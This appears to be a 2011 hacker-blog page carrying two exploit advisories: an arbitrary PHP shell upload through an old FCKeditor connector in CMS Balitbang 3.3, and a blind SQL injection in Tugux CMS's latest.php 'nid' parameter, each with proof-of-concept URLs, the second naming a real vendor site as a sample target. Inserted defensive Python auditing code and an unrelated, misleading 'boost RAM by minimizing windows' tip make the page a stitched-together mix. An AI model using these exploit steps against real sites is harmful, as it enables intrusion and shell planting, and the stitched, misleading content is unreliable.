2011/03/19

CMS Balitbang v 3.3 Arbitrary file upload vulnerability

===================================================================
CMS Balitbang v.3.3 Arbitrary file upload vulnerability
===================================================================

Software: CMS Balitbang
Vendor: www.kajianwebsite.org
Vuln Type: Arbitrary file upload
Download link: http://www.kajianwebsite.org/download/CMS%20versi%203.3.zip
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
Gratz: xx_user , kuris , and YOU !!!


===================================================================

description:
CMS Balitbang is a content management system for educational websites.
Its name is not actually CMS Balitbang, but because this CMS was developed by Balitbang Kemendiknas it is better known as CMS Balitbang. CMS Balitbang is intended to serve Indonesian education, especially schools that do not yet have a school website. Going forward, Balitbang wants every school in Indonesia to have a web-based information system that many people can access.

----------------------------------
Vulnerability details:

CMS Balitbang uses an old version of FCKeditor for file upload, available to all users. Old versions of FCKeditor are known to have a vulnerability: an attacker might be able to upload arbitrary files containing malicious PHP code because multiple file extensions are not properly checked.
Here is the code:

/webtemp/functions/editor/filemanager/connectors/php/config.php

global $Config ;

// SECURITY: You must explicitly enable this "connector". (Set it to "true").
// WARNING: don't just set "$Config['Enabled'] = true ;", you must be sure that only
// authenticated users can access this file or use some kind of session checking.
$Config['Enabled'] = true ; // <= 1

---

// Path to user files relative to the document root.
$Config['UserFilesPath'] = 'http://localhost/webtemp/userfiles/' ; // <= this is where the attacker's file or shell backdoor will be placed.

// following setting enabled.
$Config['ForceSingleExtension'] = true ; // <= 2

$Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ; // <= 3

---
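
One way to audit a connector config.php like the one quoted above for these settings (an added example, not code from CMS Balitbang or FCKeditor; the sample text, the finding codes and the `EXECUTABLE` list are assumptions made for illustration):

```python
import re

# Constructed sample: the settings quoted in the advisory (extension list shortened).
SAMPLE_CONFIG = """\
global $Config ;
$Config['Enabled'] = true ; // <= 1
$Config['UserFilesPath'] = 'http://localhost/webtemp/userfiles/' ;
$Config['ForceSingleExtension'] = true ; // <= 2
$Config['AllowedExtensions']['File'] = array('7z', 'gif', 'jpg', 'pdf', 'zip') ;
"""

# Matches "$Config['A']['B'] = value ;" lines; commented-out lines do not match.
SETTING = re.compile(r"^\s*\$Config((?:\['[^']+'\])+)\s*=\s*(.+?)\s*;", re.M)
# Assumed deny-list of extensions a PHP-enabled server may execute.
EXECUTABLE = {"php", "php3", "php4", "php5", "phtml", "phar", "cgi", "pl"}


def parse_config(text):
    """Return {'Enabled': 'true', 'AllowedExtensions.File': "array(...)", ...}."""
    settings = {}
    for keys, value in SETTING.findall(text):
        settings[".".join(re.findall(r"'([^']+)'", keys))] = value
    return settings


def audit(text):
    """Return a list of (code, message) findings for a connector config."""
    cfg, findings = parse_config(text), []
    if cfg.get("Enabled", "false").lower() == "true":
        findings.append(("ENABLED", "connector is on; confirm a session or "
                         "server-level check restricts who can reach it"))
    if cfg.get("ForceSingleExtension", "false").lower() != "true":
        findings.append(("MULTI_EXT", "ForceSingleExtension is not enabled"))
    for key, value in cfg.items():
        if key.startswith("AllowedExtensions."):
            exts = {e.lower() for e in re.findall(r"'([^']+)'", value)}
            if exts & EXECUTABLE:
                findings.append(("EXEC_EXT", f"{key} allows {sorted(exts & EXECUTABLE)}"))
    if "UserFilesPath" in cfg:
        findings.append(("UPLOAD_DIR", "disable script execution under "
                         + cfg["UserFilesPath"].strip("'\"")))
    return findings


if __name__ == "__main__":
    for code, message in audit(SAMPLE_CONFIG):
        print(f"[{code}] {message}")
```
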

With the default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code because multiple file extensions are not properly checked.
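
The multiple-extension problem described above, shown as a last-extension-only check beside a stricter one (an added example, not FCKeditor's own validation code; the function names, sample file names and both extension sets are assumptions):

```python
import re

# Assumed allow-list (a subset of the advisory's AllowedExtensions['File']).
ALLOWED = {"gif", "jpg", "jpeg", "png", "pdf", "txt", "zip", "rar"}
# Assumed list of extensions a web server may map to a script handler.
HANDLER_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar", "cgi", "pl", "asp"}


def last_extension_only(name):
    """Weak check: looks at the final extension and nothing else."""
    return name.rsplit(".", 1)[-1].lower() in ALLOWED


def check_upload_name(name):
    """Strict check: return (ok, reason) after inspecting every dot segment."""
    if not name or "/" in name or "\\" in name or "\x00" in name:
        return False, "path separator or NUL in name"
    # Trailing dots and spaces are dropped first so they cannot hide the extension.
    stem, *exts = name.lower().rstrip(". ").split(".")
    if not stem or not exts:
        return False, "missing base name or extension"
    if exts[-1] not in ALLOWED:
        return False, f"extension .{exts[-1]} not allowed"
    hidden = [e for e in exts[:-1] if e in HANDLER_EXTS]
    if hidden:
        return False, f"inner handler extension .{hidden[0]}"
    return True, "ok"


def store_name(name):
    """Collapse inner dots so the stored file has exactly one extension."""
    stem, ext = name.rsplit(".", 1)
    return re.sub(r"[^A-Za-z0-9_-]", "_", stem) + "." + ext.lower()


if __name__ == "__main__":
    # Constructed sample names.
    for sample in ("report.pdf", "photo.final.JPG", "notes.php.pdf", ".htaccess"):
        print(sample, last_extension_only(sample), check_upload_name(sample))
```

Call `store_name` only on names that `check_upload_name` accepted, and keep script execution disabled in the upload directory as a second layer.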


----------------------------------

exploit & p0c

[!] http://host//webtemp/functions/editor/filemanager/connectors/uploadtest.html // upload your file here
or
[!] http://host/path_to_CMSBalitbang/functions/editor/filemanager/connectors/uploadtest.html

your shell or file will be placed here

[!] http://localhost/webtemp/userfiles/ <= here


====================================================================

Nothing Impossible In This World Even Nobody`s Perfect

===================================================================

==========================| -=[ E0F ]=- |==========================

Trick to increase computer RAM speed

Many users asked me to find a trick to boost computer speed. After a long search I found a trick to speed up your PC and am posting it on the web.
The procedure is as follows:
1). Start any application, say Word. Open some large documents.

2). Press CTRL+SHIFT+ESC to open Windows Task Manager, click the Processes tab and sort the list in descending order on Mem Usage. You will notice that WINWORD.EXE will be somewhere at the top, using multiple MBs of memory.

3). Now switch to Word and simply minimize it. (Don't use the Minimize All Windows option of the task bar.)

4). Now go back to the Windows Task Manager and see where WINWORD.EXE is listed. Most likely you will not find it at the top. You will typically have to scroll to the bottom of the list to find Word. Now check the amount of RAM it is using. Surprised? The memory usage has dropped by a huge amount.

5). Minimize each application that you are not currently working on by clicking the Minimize button, and you can increase the amount of free RAM by a substantial margin. Depending on the number and type of applications you use together, the difference can be as much as 50 percent of extra RAM.

In any multitasking system, minimizing an application means that it won't be used by the user right now. Consequently, the OS automatically makes the application use virtual memory and keeps only bare minimum amounts of the code in physical RAM.

2011/03/18

Tugux CMS (nid) BLIND sql injection vulnerability

===================================================================
Tugux CMS (nid) BLIND sql injection vulnerability
===================================================================

Software: Tugux CMS
Vendor: www.tugux.com
Vuln Type: Blind SQL Injection
Download link: http://sourceforge.net/projects/tuguxcms/files/tuguxCMS_v.1.0_final.rar/download
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info


===================================================================

exploit & p0c

[!] latest.php?nid=[valid nid]

Example p0c

[!] http://host/latest.php?nid=9 <= True
[!] http://host/latest.php?nid=-9 <= False

[+] http://host:3306 <= download the file, save it and open it with c++ or wordpad; it will show the MySQL version

[!] sample: http://www.tugux.com:3306 result : 5.0.92-community (uses version 5.0.92) :D


====================================================================

Nothing Impossible In This World Even Nobody`s Perfect

===================================================================

==========================| -=[ E0F ]=- |==========================